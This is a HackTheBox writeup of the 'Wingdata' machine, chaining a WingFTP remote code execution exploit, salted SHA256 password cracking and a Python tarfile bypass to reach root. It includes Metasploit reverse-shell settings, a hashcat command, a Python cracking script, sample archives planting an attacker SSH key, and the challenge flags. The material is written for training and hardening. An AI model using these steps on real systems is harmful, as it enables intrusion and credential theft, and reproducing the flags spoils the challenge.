Wingdata HTB Writeup: Exploiting WingFTP RCE & CVE-2025-4517 for Root Access

Overview

  • Difficulty: Easy
  • Platform: HackTheBox
  • Focus Areas: Web Enumeration, Subdomain Discovery, RCE, Credential Cracking, Privilege Escalation, Python CVE Exploitation

This writeup walks through my full approach to compromising the Wingdata machine. The box revolves around multiple misconfigurations and vulnerabilities across different services, including a WingFTP server, weakly protected credentials, and a Python tarfile path traversal vulnerability. By combining thorough enumeration, hash cracking, and a CVE-based exploit, I was able to escalate from initial web access to full root compromise.

[Image: HackTheBox WingData]

Enumeration & Reconnaissance

Initial Network Scanning

I started with Nmap to map the target's services:

[Image: Nmap Output]

Findings:

  • SSH (port 22)
  • HTTP (port 80)

To make further testing easier, I added the target to my /etc/hosts:

[Image: Adding Host]

Virtual Host Discovery

Visiting http://wingdata.htb initially appeared to be a standard webpage. However, inspecting the page source revealed a reference to a subdomain:

[Image: Page Sources]

Adding this to /etc/hosts allowed access:

[Image: Adding Vhost]

Navigating to http://ftp.wingdata.htb revealed a WingFTP Server login page with a version number clearly displayed. This version information became crucial for the next step.

[Image: WingFTP Login Page]

Initial Access: WingFTP RCE Exploitation

Vulnerability Research

Googling the WingFTP version revealed a Remote Code Execution (RCE) vulnerability that allows unauthenticated command execution.

[Image: WingFTP Version Exploit]

Exploitation with Metasploit

Using Metasploit Framework, I loaded the appropriate exploit module:

[Image: Metasploit Search Output]
msf6> set RHOSTS ftp.wingdata.htb
msf6> set LHOST tun0
msf6> set LPORT 4444
msf6> run
[Image: Spawned Shell]

This yielded a limited shell. The current user had no access to the user flag, indicating the need for lateral movement.

Lateral Movement: Credential Cracking

User Enumeration

Inspecting /etc/passwd revealed another user:

[Image: User Enumeration]

The goal became compromising this account.

Configuration File Enumeration

Further exploration revealed configuration files containing password hashes.

[Image: User Configuration Files]
[Image: User Password Hash]

A particularly valuable file, settings.xml, documented that the hashes were:

  • SHA256
  • Salted with "WingFTP"

[Image: SHA256+Salt]

Hash Cracking with Hashcat

I compiled all hashes with their salt into a file formatted for Hashcat:

[Image: All Hashes with Salts]

Then ran Hashcat in mode 1420, which is sha256($pass.$salt) and expects one hash:salt pair per line:

hashcat -m 1420 -a 0 hashes.txt rockyou.txt

The password for the wacky user was successfully cracked.

[Image: Hashcat Output]
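Mode 1420 only works if the salt really is appended to the password; if WingFTP had prepended it, the same rockyou run would finish with zero cracks and no error. The following is an added Python example (mine, not part of the original writeup and not WingFTP code) that reproduces sha256(password + "WingFTP") from the scheme documented in settings.xml, writes the user:hash:salt lines hashcat accepts with --username, and test-cracks a few hashes under both salt orderings so the mode is settled before a long job. The account names, passwords and wordlist are constructed here, not taken from the box.

```python
"""Reproduce the WingFTP hash scheme and confirm the hashcat mode (added
example, not part of the original writeup).  The accounts, passwords and
wordlist below are constructed here, not taken from the box."""
import hashlib
from typing import Dict, Iterable, List, Optional, Tuple

SALT = "WingFTP"   # static, global salt the writeup found documented in settings.xml


def wingftp_hash(password: str, salt: str = SALT) -> str:
    """sha256(password + salt) as a hex digest: what hashcat -m 1420 computes."""
    return hashlib.sha256((password + salt).encode("utf-8")).hexdigest()


def salt_first_hash(password: str, salt: str = SALT) -> str:
    """sha256(salt + password): the -m 1410 variant, for comparison."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


# Constructed accounts; the digests are derived right here from made-up passwords.
SAMPLE_PASSWORDS = {"wacky": "sunshine1", "svc_backup": "Zx9!qL2#vB8&"}
SAMPLE_HASHES: Dict[str, str] = {u: wingftp_hash(p) for u, p in SAMPLE_PASSWORDS.items()}

# Tiny constructed wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "sunshine1", "letmein"]


def hashcat_lines(hashes: Dict[str, str], salt: str = SALT) -> List[str]:
    """user:hash:salt lines.  Feed them to hashcat with --username so the
    prefix is ignored while cracking but reported by --show."""
    return [f"{user}:{digest}:{salt}" for user, digest in hashes.items()]


def identify_mode(digest: str, salt: str,
                  candidates: Iterable[str]) -> Optional[Tuple[int, str]]:
    """Try both salt positions against a few candidates.  Picking the wrong
    mode makes hashcat run to completion with zero cracks, so settle this
    on one known-weak hash before starting a long job."""
    for word in candidates:
        if wingftp_hash(word, salt) == digest:
            return 1420, word
        if salt_first_hash(word, salt) == digest:
            return 1410, word
    return None


def crack_all(hashes: Dict[str, str], salt: str = SALT,
              candidates: Iterable[str] = WORDLIST) -> Dict[str, str]:
    """Pure-Python dictionary attack, fine for a handful of hashes; hashcat
    does the same work on a GPU for the real wordlist."""
    candidates = list(candidates)
    found = {}
    for user, digest in hashes.items():
        hit = identify_mode(digest, salt, candidates)
        if hit:
            found[user] = hit[1]
    return found


if __name__ == "__main__":
    print("\n".join(hashcat_lines(SAMPLE_HASHES)))   # the hashes.txt content
    print(crack_all(SAMPLE_HASHES))                     # only the weak password falls
```

Once identify_mode() confirms 1420 on a test hash, the real run is hashcat -m 1420 --username -a 0 hashes.txt rockyou.txt; had it returned 1410, only the mode number changes.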

Gaining User Access

With valid credentials I SSH'd into the machine as wacky, which gave access to the user flag:

[Image: User Flag]
User Flag: 228c965be2452ae6a28ddfc1a8f769fb

Privilege Escalation: CVE-2025-4517

Sudo Enumeration

I ran linpeas.sh as wacky, which revealed a sudo privilege:

[Image: LinPEAS Output]

A NOPASSWD rule whose command ends in a wildcard lets wacky pass arbitrary arguments to a script that runs as root, so the script's own handling of those arguments becomes the only security boundary.

Vulnerable Script Analysis

Examining /opt/backup_clients/restore_backup_clients.py, I found the critical section:

[Image: Python File Code Snippet]

Observations:

  • backup_path is user-controlled.
  • The script extracts archives as root.
  • filter="data" is intended to block absolute paths, path traversal and links that point outside the extraction directory.
  • /opt/backup_clients/backups/ is writable by wacky.

CVE-2025-4517: Python Tarfile Path Traversal

This is one of the tarfile extraction-filter bypasses fixed in the June 2025 Python security releases (3.12.11 and 3.13.4, with corresponding 3.9, 3.10 and 3.11 releases); the target runs Python 3.12.3, which is affected.

  • The filter="data" parameter is supposed to reject absolute paths, path traversal and links that resolve outside the extraction directory.
  • The check resolves each target with os.path.realpath(); if a crafted path exceeds PATH_MAX (4096 bytes), realpath() fails to fully resolve symlinks and returns a "safe-looking" path that passes the check.
  • The result is an arbitrary file write outside the intended extraction directory, and here it happens as root because the script runs under sudo.
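The root cause is a privileged script trusting user-controlled input on both sides: the archive path (through the sudo wildcard) and the archive contents (through a single library filter). The following is an added Python example of how I would harden such a restore step; it is not the script from the box, and the directory /var/backups/clients, the function names and the sample archives are assumptions made here. It takes a backup identifier rather than a path, validates every tar member itself (no links, no devices, no absolute or traversing names) without calling os.path.realpath(), so the long-path bypass described above has nothing to act on, and only then extracts, still passing filter="data" where the interpreter supports it as a second layer.

```python
"""Hardened restore step for a root-run backup script (added example, not the
script from the box).  /var/backups/clients, the function names and the
sample archives below are assumptions made for this illustration."""
import io
import os
import posixpath
import re
import tarfile
import tempfile
from typing import Dict, List, Tuple

BACKUP_DIR = "/var/backups/clients"   # assumed root-owned and not user-writable


class UnsafeMember(ValueError):
    """Raised for any argument or archive member a backup of plain files never needs."""


def resolve_backup(name: str) -> str:
    """Accept a backup *identifier*, never a path.  With a NOPASSWD wildcard
    in sudoers the caller can pass anything, so the script must restrict
    itself instead of trusting argv."""
    if name.startswith(".") or not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}\.tar(\.gz)?", name):
        raise UnsafeMember(f"{name!r}: not a backup name")
    return os.path.join(BACKUP_DIR, name)


def check_member(member: tarfile.TarInfo) -> None:
    """Allow regular files and directories with sane relative names only.
    No realpath() is involved, so a name long enough to break realpath()
    (the CVE-2025-4517 trick) gains an attacker nothing here."""
    if not (member.isfile() or member.isdir()):
        raise UnsafeMember(f"{member.name}: links and special files are not allowed")
    name = member.name
    if name.startswith("/") or "\\" in name or "\x00" in name:
        raise UnsafeMember(f"{name}: absolute or malformed name")
    if ".." in posixpath.normpath(name).split("/"):
        raise UnsafeMember(f"{name}: escapes the destination")


def restore_backup(archive: bytes, dest: str) -> List[str]:
    """Validate every member before touching the filesystem, then extract.
    filter='data' is kept as defence in depth where the interpreter has it."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        members = tar.getmembers()
        for m in members:
            check_member(m)
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, members=members, **extra)
    return [m.name for m in members]


def build_archive(entries: List[Tuple[str, str, str]]) -> bytes:
    """Constructed archives for the demo: (name, file contents, symlink target);
    a non-empty symlink target makes the entry a symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data, linkname in entries:
            info = tarfile.TarInfo(name)
            if linkname:
                info.type = tarfile.SYMTYPE
                info.linkname = linkname
                tar.addfile(info)
            else:
                payload = data.encode()
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def demo() -> Dict[str, str]:
    """Run the checks against one clean and two hostile constructed archives."""
    archives = {
        "clean": build_archive([("clients/acme.json", '{"id": 1}', "")]),
        # classic traversal: the name walks out of the extraction directory
        "traversal": build_archive([("../../root/.ssh/authorized_keys",
                                     "ssh-ed25519 AAAA attacker", "")]),
        # symlink planted first, then a file written "through" it
        "symlink": build_archive([("clients", "", "/root"),
                                  ("clients/.ssh/authorized_keys",
                                   "ssh-ed25519 AAAA attacker", "")]),
    }
    results = {}
    with tempfile.TemporaryDirectory() as dest:
        for label, archive in archives.items():
            try:
                names = restore_backup(archive, dest)
                results[label] = "extracted " + ",".join(names)
            except UnsafeMember as err:
                results[label] = "rejected: " + str(err)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:10} {outcome}")
```

The point of check_member() is that it decides on the member's declared name and type alone, before anything exists on disk; the library's data filter still runs afterwards, but a future bypass of it no longer turns into a root-owned file outside the backup directory.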

Exploitation

I leveraged a publicly available exploit for CVE-2025-4517 targeting Python's tarfile module. The exploit takes advantage of the filter="data" bypass in Python 3.12.3 to achieve path traversal. Using the script, I executed the vulnerable backup restoration script as root, which allowed me to gain root access, from which I retrieved the root flag:

[Image: Root Flag]
Root Flag: 2b988934c03b0d28fe930af2fe74cdae

Key Takeaways

  • Enumeration: Always inspect page sources for subdomains; virtual host discovery is often overlooked.
  • Credential Security: A single static salt ("WingFTP") shared by every account, combined with a fast hash like SHA256, is barely better than no salt at all, since one rockyou pass covers every user. Store passwords with a per-user random salt and a slow, memory-hard password hash (bcrypt, scrypt or Argon2).
  • Sudo Misconfigurations: Wildcard arguments with NOPASSWD can be extremely dangerous, especially when combined with user-writable directories.
  • Library Vulnerabilities: Stay updated on CVEs affecting core libraries. The filter parameter in Python's tarfile module is not a silver bullet.
  • Python Version Patching: Upgrade to a release that contains the June 2025 tarfile filter fixes (3.12.11 or 3.13.4, or the corresponding 3.9, 3.10 and 3.11 security releases). Patching alone is not enough here: a root-run script should not extract archives from a user-writable directory, and the sudo rule should not accept arbitrary arguments.

Conclusion

This machine demonstrates how multiple minor vulnerabilities and misconfigurations can be chained together into a full compromise:

  • Web and virtual host enumeration revealing a vulnerable WingFTP server
  • Remote Code Execution on WingFTP to gain initial access
  • Discovery of user hashes in configuration files
  • Cracking SHA256 salted hashes to move laterally to another user
  • Writable directories combined with wildcard sudo privileges
  • Exploitation of Python tarfile path traversal (CVE-2025-4517) for root access

By carefully enumerating each service, analyzing exposed credentials, and leveraging known library vulnerabilities, it was possible to escalate from limited web access to full root control of the machine.